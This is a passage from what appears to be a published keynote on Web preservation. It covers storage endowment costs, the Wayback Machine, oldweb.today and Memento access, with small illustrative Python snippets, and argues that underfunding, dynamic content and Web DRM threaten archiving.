"forever". It increases strongly as the Kryder rate falls below 20%, which it has. <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html">Absent unexpected technological change</a>, the cost of long-term data storage is far higher than most people realize.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote10">[10]</a></sup>
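<br /><br />A toy version of the endowment calculation shows the shape of the problem. This sketch is a drastic simplification of the model behind the graph, assuming only a constant Kryder rate and a constant real interest rate, and ignoring media replacement, power, space and labor:<br />
<pre>def endowment(annual_cost, kryder_rate, interest_rate, years=100):
    """Money needed up front so that, invested at interest_rate, it
    covers a storage cost that falls by kryder_rate each year."""
    total = 0.0
    for year in range(years):
        cost = annual_cost * (1 - kryder_rate) ** year
        total += cost / (1 + interest_rate) ** year   # discount to today
    return total


# Data costing $100/yr to store today, money earning 2% real interest:
for k in (0.40, 0.20, 0.10, 0.05):
    print(f"Kryder rate {k:.0%}: endowment ${endowment(100, k, 0.02):,.0f}")</pre>
With these toy numbers the endowment roughly sextuples as the Kryder rate falls from 40% to 5%, the same qualitative behavior as the graph.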
<h4>What have we learned about access?</h4>There is clearly a demand for access to the Web's history. The Internet Archive's Wayback Machine provides well over 1M users/day access to it.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-s2_AFgyOjxU/VpaDdD5o-5I/AAAAAAAAC4c/EhLW8T_IiLA523J0Fjbr1Nk889bOCHJ2ACPcBGAYYCw/s1600/JinxPuvWayback.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="820" data-original-width="815" height="200" src="https://2.bp.blogspot.com/-s2_AFgyOjxU/VpaDdD5o-5I/AAAAAAAAC4c/EhLW8T_IiLA523J0Fjbr1Nk889bOCHJ2ACPcBGAYYCw/s200/JinxPuvWayback.png" width="198" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1995 Web page</td></tr></tbody></table>On Jan 11<sup>th</sup> 1995, the late <a href="https://en.wikipedia.org/wiki/Mark_Weiser">Mark Weiser</a>, CTO of Xerox PARC, created <a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html">Nijinsky and Pavlova's Web page</a>, perhaps the start of the Internet's obsession with cat pictures. You can view this important historical artifact by pointing your browser to the Internet Archive's Wayback Machine, which captured the page 39 times between <a href="https://web.archive.org/web/19981201080657/http://www.ubiq.com/hypertext/weiser/Kitten.html">Dec 1<sup>st</sup> 1998</a> and <a href="https://web.archive.org/web/20080511175020/http://www.ubiq.com/hypertext/weiser/Kitten.html">May 11<sup>th</sup> 2008</a>. What you see using your modern browser is perfectly usable, but it is slightly different from what Mark saw when he finished the page over 22 years ago.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-07JaPaN9rhk/VpaGhKx_uEI/AAAAAAAAC4o/iYxSfzXIXmwnI_w0MikaovBicnWu5LOLwCPcBGAYYCw/s1600/JunxAndPuvOldwebToday.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="912" data-original-width="1376" height="132" src="https://3.bp.blogspot.com/-07JaPaN9rhk/VpaGhKx_uEI/AAAAAAAAC4o/iYxSfzXIXmwnI_w0MikaovBicnWu5LOLwCPcBGAYYCw/s200/JunxAndPuvOldwebToday.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html">Via oldweb.today</a></td></tr></tbody></table><a href="http://blog.dshr.org/2016/01/guest-post-ilya-kreymer-on-oldwebtoday.html">Ilya Kreymer</a> used two important recent developments in digital preservation to build <a href="http://oldweb.today/">oldweb.today</a>, a Web site that allows you to view preserved Web content using the browser that its author would have. The first is that <a href="https://mellon.org/Rosenthal-Emulation-2015">emulation &amp; virtualization techniques</a> have advanced enough to allow Ilya to create, on the fly behind the Web page, a virtual machine running, in this case, a 1998 version of Linux with a 1998 version of the Mosaic browser visiting the page. Note the different fonts and background. This is very close to what Mark would have seen in 1995.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-vdxcR1a76bo/WcHqEbF5phI/AAAAAAAAD5Y/z4YkOJZm0UcKF54DttMOFXEppcmDYRgrwCLcBGAs/s1600/stanford-ukwa-archive-it.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="333" data-original-width="359" height="185" src="https://4.bp.blogspot.com/-vdxcR1a76bo/WcHqEbF5phI/AAAAAAAAD5Y/z4YkOJZm0UcKF54DttMOFXEppcmDYRgrwCLcBGAs/s200/stanford-ukwa-archive-it.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://netpreserveblog.wordpress.com/2016/01/08/memento-help-us-route-uri-lookups-to-the-right-archives/">Source</a></td></tr></tbody></table>The Internet Archive is by far the biggest Web archive, for example holding around 40 times as much data as the UK Web Archive. But the smaller archives contain pages it lacks, and there is <a href="https://netpreserveblog.wordpress.com/2016/01/08/memento-help-us-route-uri-lookups-to-the-right-archives/">little overlap between them</a>, showing the value of curation.<br /><br />The second development is Memento (<a href="https://tools.ietf.org/rfc/rfc7089.txt">RFC7089</a>), a Web protocol that allows access facilities such as <a href="http://oldweb.today/">oldweb.today</a> to treat the set of compliant Web archives as if it were one big archive.
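<br /><br />The protocol is simple: a client asks a "TimeGate" for the archived copy, the "memento", of a URL closest to a desired datetime, supplied in an Accept-Datetime header. A minimal sketch (the endpoint layout here is the Wayback Machine's TimeGate; any RFC7089-compliant archive behaves the same way):<br />
<pre>import requests


def closest_memento(url, when):
    """Ask a Memento TimeGate for the archived copy of url closest to
    when, an RFC 1123 datetime string (see RFC 7089)."""
    timegate = "https://web.archive.org/web/" + url    # Wayback's TimeGate
    resp = requests.get(timegate,
                        headers={"Accept-Datetime": when},
                        allow_redirects=False)
    # The TimeGate answers with a redirect whose Location header points
    # at the closest memento the archive holds.
    return resp.headers.get("Location")


print(closest_memento("http://www.ubiq.com/hypertext/weiser/Kitten.html",
                      "Wed, 11 Jan 1995 00:00:00 GMT"))</pre>
For the kitten page the answer would be the December 1998 capture, the closest the Wayback Machine has to 1995. A Memento aggregator applies the same request across many archives at once and picks the best answer.<br /><br />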
oldweb.today aggregates many Web archives, pulling each Web resource a page needs from the archive with the copy closest in time to the requested date.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote14">[14]</a></sup><br /><h3>The future of Web preservation</h3>There are two main threats to the future of Web preservation, one economic and the other a combination of technological and legal.<br /><h4>The economic threat</h4>Preserving the Web and other digital content for posterity is primarily an <a href="http://blog.dshr.org/2007/06/petabyte-for-century.html">economic problem</a>. With an <a href="http://blog.dshr.org/2011/09/modeling-economics-of-long-term-storage.html">unlimited budget, collection and preservation aren't a problem</a>. The reason we're collecting and preserving <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">less than half the classic Web</a> of quasi-static linked documents is that <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-2.html">no-one has the money</a> to do much better. The other half is more difficult and thus more expensive. Collecting and preserving the whole of the classic Web would need the current global Web archiving budget to be roughly tripled, perhaps an additional $50M/yr.<br /><br />Then there are the much higher costs involved in preserving the dynamic <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-3.html">"Web 2.0" content we currently miss</a>, which is much more than half of the Web.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-27stcjYS3zk/WYCwX18gFuI/AAAAAAAAD0M/NKJHNRGii7wfqSxKle4FmwzPrSAyW_10gCEwYBhgL/s1600/graph2.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="480" data-original-width="640" height="150" src="https://1.bp.blogspot.com/-27stcjYS3zk/WYCwX18gFuI/AAAAAAAAD0M/NKJHNRGii7wfqSxKle4FmwzPrSAyW_10gCEwYBhgL/s200/graph2.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">British Library real income</td></tr></tbody></table>If we are to continue to preserve even as much of society's memory as we currently do, we face two very difficult choices: either find a lot more money, or radically reduce the cost per site of preservation.<br /><br />It will be hard to find a lot more money in a world where libraries and archive budgets are <i>decreasing</i>. For example, the graph shows that the British Library's income has declined by 45% in real terms over the last decade.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote2">[2]</a></sup><br /><br />The Internet Archive is already big enough to reap economies of scale, and it already uses <a href="http://www.digitalpreservation.gov/meetings/documents/ndiipp13/Kris.pdf">innovative engineering to minimize cost</a>. But Leetaru and others criticize it for:<br /><ul><li>Inadequate metadata to support access and research.</li><li>Lack of quality assurance leading to incomplete collection of sites.</li><li>Failure to collect every version of a site.</li></ul>Generating good metadata and doing good QA are hard to automate and thus the first two are expensive. 
But the third is simply impossible.<br /><h4>The technological/legal threat</h4>The technological/legal threats to archiving the Web stem from its two business models, advertising and subscription:<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-KF9IyPjrVD0/Wc6Bw_GK9sI/AAAAAAAAD6U/nMEuvvpjJ6oGD99v6jNZ-mvMLcdi9BZdACLcBGAs/s1600/cnn-weather-reload-diff-imgs.gif" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="400" data-original-width="640" height="125" src="https://4.bp.blogspot.com/-KF9IyPjrVD0/Wc6Bw_GK9sI/AAAAAAAAD6U/nMEuvvpjJ6oGD99v6jNZ-mvMLcdi9BZdACLcBGAs/s200/cnn-weather-reload-diff-imgs.gif" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Note weather in GIF of reloads of<br /><a href="http://web.archive.org/web/20130724144801/http://www.cnn.com/">CNN page from Wayback Machine</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote17">[17]</a></sup></td></tr></tbody></table><ul><li>To maximize the effectiveness of advertising, the Web now potentially delivers different content on every visit to a site. What does it mean to "archive" something that changes every time you look at it?</li><li>To maximize the effectiveness of subscriptions, the Web now potentially prevents copying content and thus archiving it. How can you "archive" something you can't copy?</li></ul>Personalization, geolocation and adaptation to browsers and devices mean that each of the about <a href="https://en.wikipedia.org/wiki/List_of_countries_by_number_of_Internet_users">3.4*10<sup>9</sup> Internet users</a> may see different content from each of about 200 countries they may be in, and from each of, say, 100 device and browser combinations they may use; that is 3.4*10<sup>9</sup> * 200 * 100, or roughly 7*10<sup>13</sup>, potential versions of each page. Storing <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-3.html">every possible version of a single average Web page</a> could thus require downloading about 160 exabytes, 8000 times as much Web data as the Internet Archive holds.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-XrNPtq8066Q/V6z0GEfCTEI/AAAAAAAADFk/kC_Y-1vg-GUGMrGpWgW5k1I5BuXvSWFAQCPcBGAYYCw/s1600/ad-networks.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="112" src="https://2.bp.blogspot.com/-XrNPtq8066Q/V6z0GEfCTEI/AAAAAAAADFk/kC_Y-1vg-GUGMrGpWgW5k1I5BuXvSWFAQCPcBGAYYCw/s200/ad-networks.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Source</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote16">[16]</a></sup></td></tr></tbody></table>The situation is even worse. <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Ads are inserted by a real-time auction system</a>, so even if the page content is the same on every visit, the ads differ. 
Future scholars, like current scholars studying <a href="https://www.nytimes.com/2017/09/06/technology/facebook-russian-political-ads.html">Russian use</a> of <a href="https://www.nytimes.com/2017/10/09/technology/google-russian-ads.html">social media</a> in the 2016 US election, will want to study the ads but they won't have been systematically collected, unlike <a href="https://blog.archive.org/2016/01/22/political-tv-ad-archive-launches-today/">political ads on TV</a>.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote21">[21]</a></sup><br /><br />The point here is that, no matter how much resource is available, <i>knowing that an archive has collected all, or even a representative sample, of the versions of a Web page is completely impractical.</i> This isn't to say that trying to do a better job of collecting <i>some</i> versions of a page is pointless, but it is never going to provide future researchers with the certainty they crave. And doing a better job of each page will be expensive.<br /><br />Although it is possible to collect <i>some</i> versions of today's dynamic Web pages, it is likely soon to become impossible to collect <i>any</i> version of most Web pages. Against unprecedented opposition, Netflix and other large content owners with subscription or pay-per-view business models have forced W3C, the standards body for the Web, to <a href="https://arstechnica.com/gadgets/2017/09/drm-for-html5-published-as-a-w3c-recommendation-after-58-4-approval/">mandate that browsers support Encrypted Media Extensions (EME)</a>, i.e. Digital Rights Management (DRM) for the Web.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote15">[15]</a></sup><br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-2FRjhPFGUag/WMmAHEbjTAI/AAAAAAAADro/zqmSZTRUnPwBKJDxb4FzimekcfbN_CB0ACLcB/s1600/W3C-EME-1.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="139" src="https://2.bp.blogspot.com/-2FRjhPFGUag/WMmAHEbjTAI/AAAAAAAADro/zqmSZTRUnPwBKJDxb4FzimekcfbN_CB0ACLcB/s200/W3C-EME-1.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.w3.org/TR/encrypted-media/stack_overview.svg">EME data flows</a></td></tr></tbody></table>The W3C's diagram of the EME stack shows an example of how it works. An application, i.e. a Web page, requests the browser to render some encrypted content. It is delivered, in this case from a Content Distribution Network (CDN), to the browser. The browser needs a license to decrypt it, which it obtains from the application via the EME API by creating an appropriate session and then using it to request the license. It hands the content and the license to a Content Decryption Module (CDM), which can decrypt the content using a key in the license and render it.<br /><br />What is DRM trying to achieve? Ostensibly, it is trying to ensure that each time DRM-ed content is rendered, specific permission is obtained from the content owner. In order to ensure that, the CDM cannot trust the browser it is running in. For example, it must be sure that the browser can see neither the decrypted content nor the key. If it could see, and save for future use, either of them, it would defeat the purpose of DRM. 
The license server will not be available to the archive's future users, so preserving the encrypted content without the license is pointless.<br /><br />Content owners are not stupid. They realized early on that the search for uncrackable DRM was a fool's errand<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote22">[22]</a></sup>. So, to deter reverse engineering, they arranged for the 1998 Digital Millennium Copyright Act (<a href="https://web.archive.org/web/20070609221838/http://www.eff.org/IP/DMCA/">DMCA</a>) to make any attempt to circumvent protections on digital content a criminal offense. US trade negotiations mean that almost all countries (except Israel) have DMCA-like laws.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote23">[23]</a></sup><br /><br />Thus we see that the real goal of EME is to ensure that, absent special legislation such as a few national libraries have, anyone trying to either capture the decrypted content, or preserve the license for future use, would be committing a crime. Even though the British Library, among others, has the legal right to capture the decrypted content, it is doubtful that they have the technical or financial resources to do so at scale.<br /><br />Scale is what libraries and archives would need. Clearly, EME will be rapidly adopted for streaming video sites, not just Netflix but YouTube, Vimeo and so on. Even a decade ago, to <a href="http://blog.dshr.org/2007/10/whos-looking-after-snowman.html">study US elections you needed YouTube video</a>, but it will no longer be possible to preserve Web video.<br /><br />But that's not the big impact that EME will have on society's memory. It is intended for video and audio, but it will be hard for W3C to argue that other valuable content doesn't deserve the same protection, for example academic journals. DRM will spread to other forms of content. The business models for Web content are of two kinds, and both are struggling:<br /><ul><li><b>Paywalled content</b>. It turns out that, apart from movies and academic publishing, only a very few premium brands such as <a href="https://www.economist.com/"><i>The Economist</i></a>, the <a href="https://www.wsj.com/"><i>Wall Street Journal</i></a> and the <a href="https://www.nytimes.com/"><i>New York Times</i></a> have viable subscription business models based on (mostly) paywalled content. Even excellent journalism such as <a href="https://www.theguardian.com/"><i>The Guardian</i></a> is reduced to free access, advertising and voluntary donations. Part of the reason is that Googling the headline of paywalled news stories often finds open access versions of the content. Clearly, newspapers and academic publishers would love to use Web DRM to ensure that their content could be accessed only from their site, not via Google or <a href="http://blog.dshr.org/2016/03/elsevier-and-streisand-effect.html">Sci-Hub</a>.</li><li><b>Advertising-supported content</b>. 
The market for Web advertising is so competitive and <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">fraud-ridden</a> that Web sites have been forced into letting advertisers run <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads so obnoxious</a>, and indeed so riddled with malware, and to load up their <a href="http://blog.dshr.org/2016/11/open-access-and-surveillance.html">sites with so many trackers</a>, that many users have rebelled.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote24">[24]</a></sup> They use ad-blockers; these days it is pretty much essential to do so to <a href="http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf">keep yourself safe</a> and to reduce <a href="http://ieee-security.org/TC/SPW2015/W2SP/papers/W2SP_2015_submission_32.pdf">bandwidth consumption</a>. Not to mention that sites such as Showtime are so desperate for income that their <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">ads mine cryptocurrency in your browser</a>. Sites are very worried about the loss of income from blocked ads. Some, such as Forbes, refuse to supply content to browsers that block ads (which, in Forbes' case, turned out to be a public service; the <a href="http://www.networkworld.com/article/3021113/security/forbes-malware-ad-blocker-advertisements.html">ads carried malware</a>). DRM-ing a site's content will prevent ads being blocked. Thus ad space on DRM-ed sites will be more profitable, and sell for higher prices, than space on sites where ads can be blocked. The pressure on advertising-supported sites, which include both free and subscription news sites, to DRM their content will be intense.</li></ul>Thus the advertising-supported bulk of what we think of as the Web, and the paywalled resources such as news sites that future scholars will need, will become un-archivable.<br /><h3>Summary</h3>I wish I could end this talk on an optimistic note, but I can't. The information the future will need about the world of today is on the Web. Our ability to collect and preserve it has been both inadequate and decreasing. This is primarily due to massive under-funding: a few tens of millions of dollars per year worldwide, set against the trillions of dollars per year of revenue the Web generates. There is no realistic prospect of massively increasing the funding for Web archiving. The funding for the world's memory institutions, whose job it is to remember the past, has been under sustained attack for many years.<br /><br />The largest component of the cost of Web archiving is the initial collection. The evolution of the Web from a set of static, hyper-linked documents to a JavaScript programming environment has been steadily raising the difficulty and thus cost of collecting the typical Web page. The increasingly dynamic nature of the resulting Web content means that each individual visit is less and less representative of "the page". What does it mean to "preserve" something that is different every time you look at it?<br /><br />And now, with the advent of Web DRM, our likely future is one in which it is not simply increasingly difficult, expensive and less useful to collect Web pages, but actually illegal to do so.<br /><h3>Call To Action</h3>So I will end with a call to action. 
Please:<br /><ul><li><b>Use the Wayback Machine's <a href="https://archive.org/web/">Save Page Now</a></b> facility to preserve pages you think are important.</li><li><b>Support the work of the <a href="https://archive.org/donate/">Internet Archive</a></b> by donating money and materials.</li><li><b>Make sure your national library is preserving your nation's Web presence.</b></li><li><b>Push back against any attempt by W3C to extend Web DRM.</b></li></ul><h3>Footnotes</h3><ol><li id="Footnote1"> For details, see <a href="https://www.worldcat.org/title/chemistry-and-chemical-technology-part-1-paper-and-printing/oclc/489827792">volume 5 part 1</a> of <a href="https://en.wikipedia.org/wiki/Joseph_Needham" title="Joseph Needham">Joseph Needham</a>'s <i><a href="https://en.wikipedia.org/wiki/Science_and_Civilisation_in_China" title="Science and Civilisation in China">Science and Civilisation in China</a></i>.</li><li id="Footnote2">The nominal income data was obtained from the British Library's <a href="https://www.bl.uk/aboutus/annrep/index.html"><i>Annual Report</i></a> series. The real income was computed from it using <a href="http://www.bankofengland.co.uk/education/Pages/resources/inflationtools/calculator/default.aspx">the Bank of England's official inflation calculator</a>. More on this, including the data for the graph, is <a href="http://blog.dshr.org/2017/08/preservation-is-not-technical-problem.html">here</a>.</li><li id="Footnote3">The BBC report on their <a href="http://www.bbc.com/news/magazine-37861457">nomination of Mao Kobayashi</a> as one of their "100 Women 2016" includes: <blockquote>In Japan, people rarely talk about cancer. You usually only hear about someone's battle with the disease when they either beat it or die from it, but 34-year-old newsreader Mao Kobayashi decided to break the mould with a blog - now the most popular in the country - about her illness and how it has changed her perspective on life. </blockquote>It is noteworthy that, unlike the BBC, Dr. Kao doesn't link to <a href="http://ameblo.jp/maokobayashi0721/">Mao Kobayashi's blog</a>, nor does she link to Stanford's preserved copy. Fortunately, the Internet Archive started <a href="https://web.archive.org/web/*/http://ameblo.jp/maokobayashi0721/">collecting Kobayashi's blog</a> in September 2016.</li><li id="Footnote4">Note that both links in this quote have rotted. I replaced them with links to the preserved copies in the <a href="https://www.archive.org/web/">Internet Archive's Wayback Machine</a>. </li><li id="Footnote5">More on this and related research can be found <a href="http://blog.dshr.org/2016/12/reference-rot-is-worse-than-you-think.html">here</a> and <a href="http://blog.dshr.org/2008/12/persistence-of-poor-peer-reviewing.html">here</a>.</li><li id="Footnote6">Compare the Wayback Machine's capture of the Leave campaign's website&nbsp; <a href="https://web.archive.org/web/20160620214900/http://www.voteleavetakecontrol.org/">three days before the referendum</a> with the <a href="https://web.archive.org/web/20160901000000*/http://www.voteleavetakecontrol.org/">day after</a> (still featuring the battle bus with the £350 million claim) and <a href="https://web.archive.org/web/20160823134359/http://www.voteleavetakecontrol.org/">nine weeks later</a> (without the battle bus). 
This scrubbing of inconvenient history is a <a href="https://www.theguardian.com/politics/2013/nov/13/conservative-party-archive-speeches-internet">habit with UK Conservatives</a>:<br /><blockquote class="tr_bq">The <a href="https://www.theguardian.com/politics/conservatives">Conservatives</a> have removed a decade of speeches from their website and from the main internet library – including one in which David Cameron claimed that being able to search the web would democratise politics by making "more information available to more people".<br /><br />The party has removed the archive from its public website, erasing records of speeches and press releases from 2000 until May 2010. The effect will be to remove any speeches and articles during the Tories' modernisation period, including its commitment to spend the same as a Labour government.<br />...<br />In a remarkable step the party has also blocked access to the Internet Archive's <a class="u-underline" data-link-name="in body link" href="http://web.archive.org/web/20130628160358/http://www.conservatives.com/" title="Wayback Archive">Wayback Machine</a>, a US-based library that captures webpages for future generations, using a <a href="http://www.conservatives.com/robots.txt">software robot </a>that directs search engines not to access the pages.</blockquote></li><li id="Footnote7">Wikipedia has a comprehensive article on the <a href="https://en.wikipedia.org/wiki/Mission_Accomplished_speech">"Mission Accomplished" speech</a>. A quick-thinking reporter's <i>copying</i> of an on-line court docket <a href="http://blog.dshr.org/2010/10/future-of-federal-depository-libraries.html">revealed more history rewriting</a> in the aftermath of the 2008 financial collapse. Another example of how the Wayback Machine exposed more of the Federal government's Winston Smith-ing is <a href="http://blog.dshr.org/2013/08/winston-smith-lives.html">here</a>.</li><li id="Footnote8">The quote is the abstract to a BBC World Service programme entitled <a href="http://www.bbc.co.uk/programmes/p031zp5y"><i>Restoring a Lost Web Domain</i></a>.</li><li id="Footnote9">To discuss the reliability requirements for long-term storage, I've been using "A Petabyte for a Century" as a <a href="http://blog.dshr.org/search?q=Petabyte+century&amp;max-results=20&amp;by-date=true">theme on my blog since 2007</a>. It led to a <a href="http://www.bl.uk/ipres2008/presentations_day2/43_Rosenthal.pdf">paper at iPRES 2008</a> and an <a href="http://queue.acm.org/detail.cfm?id=1866298">article for <i>ACM Queue</i></a> entitled <i>Keeping Bits Safe: How Hard Can It Be?</i> which subsequently appeared in <a href="http://dx.doi.org/10.1145/1839676.1839692"><i>Communications of the ACM</i></a>, triggering some <a href="http://blog.dshr.org/2011/10/acm-copyrights.html">interesting observations on copyright</a>.</li><li id="Footnote10">I have been <a href="http://blog.dshr.org/search/label/storage%20costs">blogging about the costs of long-term storage</a> with the theme "<a href="http://blog.dshr.org/2012/10/storage-will-be-lot-less-free-than-it.html">Storage Will Be Much Less Free Than It Used To Be</a>" since at least 2010. The graph is from a <a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html">simplified version of the economic model</a> of long-term storage initially described in <a href="http://www.lockss.org/locksswp/wp-content/uploads/2012/09/unesco2012.pdf">this 2012 paper</a>. 
For a detailed discussion of technologies for long-term storage see <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html"><i>The Medium-Term Prospects For Long-Term Storage Systems</i></a>.</li><li id="Footnote11">The <a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">Maclean's article continues</a>:<blockquote>The need for such efforts has taken on new urgency since 2014, says Li, when some 1,500 websites were centralized into one, with more than 60 per cent of content shed. Now that reporting has switched from print to digital only, government information can be altered or deleted without notice, she says. (One example: In October 2012, the word “environment” disappeared entirely from the section of the Transport Canada website discussing the Navigable Waters Protection Act.)</blockquote></li><li id="Footnote12"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s1600/SejongSillok.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="461" data-original-width="591" height="155" src="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s200/SejongSillok.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.unesco.org/webworld/nominations/images/korea/6b.jpg">Source</a></td></tr></tbody></table>The nova was recorded in the <i>Joseonwangjosillok</i>, the <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation"><i>Annals of the Joseon Dynasty</i></a>. Multiple copies were printed on paper, stored in multiple, carefully designed, geographically diverse archives, and faithfully tended according to a specific process of regular audit, the details of which were carefully recorded each time. Copies lost in war were re-created. I blogged about the <a href="http://blog.dshr.org/2017/09/long-lived-scientific-observations.html">truly impressive preservation techniques that have kept them legible for almost 6 centuries</a>.</li><li id="Footnote13">Estimating what proportion of the Web is preserved is a hard problem. The numerator, the content of the world's Web archives, is fairly easy to measure. But the denominator, the size of the whole Web, is extremely hard to measure. I discuss some attempts <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">here</a>. </li><li id="Footnote14">Ilya Kreymer details the operation of <a href="http://oldweb.today/">oldweb.today</a> in a <a href="http://blog.dshr.org/2016/01/guest-post-ilya-kreymer-on-oldwebtoday.html">guest post on my blog</a>.</li><li id="Footnote15">For all the gory details on the problems EME poses for archives, the security of Web browsers, and many other areas, see <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html"><i>The Amnesiac Civilization: Part 4</i></a>. </li><li id="Footnote16">The image is a slide from a talk by the amazing Maciej Cegłowski entitled <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm"><i>What Happens Next Will Amaze You</i></a>, and it will. 
Cory Doctorow <a href="https://boingboing.net/2015/10/05/botwars-vs-ad-tech-the-origin.html">calls Cegłowski's talks "barn-burning"</a>, and he's right.</li><li id="Footnote17">This GIF is an animation of a series of reloads of a preserved version of <a href="http://web.archive.org/web/20130724144801/http://www.cnn.com/">CNN's home page from 24 July 2013</a>. Nothing is coming from the live Web; all the different weather images are the result of a single collection by the Wayback Machine's crawler. GIF and information courtesy of Michael Nelson. </li><li id="Footnote18">See also this excellent brief video from Arquivo.pt, the Portuguese Web Archive, <a href="https://youtu.be/YVqFey7hVJc">explaining Web archiving for the general public</a>. It is in Portuguese but with English subtitles.</li><li id="Footnote19">"hundreds of billions" is guesswork on my part. I don't know of any plausible estimates of the investment in Web content. In <a href="https://youtu.be/YVqFey7hVJc">this video</a>, Daniel Gomes claims that Arquivo.pt estimated that the value of the content it preserves is €216B, but the methodology used is not given. Their estimate seems high; Portugal's 2016 GDP was €185B.</li><li id="Footnote20">In <a href="https://doi.org/10.1145/3041656"><i>Comparing the Archival Rate of Arabic, English, Danish, and Korean Language Web Pages</i></a> Lulwah Alkwai, Michael Nelson and Michelle Weigle report that in their sample of Web pages:<br /><blockquote>English has a higher archiving rate than Arabic, with 72.04% archived. However, Arabic has a higher archiving rate than Danish and Korean, with 53.36% of Arabic URIs archived, followed by Danish and Korean with 35.89% and 32.81% archived, respectively. </blockquote>Their Table 31 also reveals some problems with the quality of Korean Web page archiving.<br /><table border="2" cellpadding="5" cellspacing="0"><tbody><tr><td align="center" colspan="3">Table XXXI. Top 10 Archived Korean URI-Rs</td></tr><tr><td>Korean URI-Rs</td><td>Memento Count</td><td>Category</td></tr><tr><td>doumi.hosting.bora.net/infomail/error/message04.html</td><td>54,339</td><td>Error page</td></tr><tr><td>joins.com</td><td>17,096</td><td>News</td></tr><tr><td>html.giantsoft.co.kr/404.html</td><td>17,046</td><td>Error 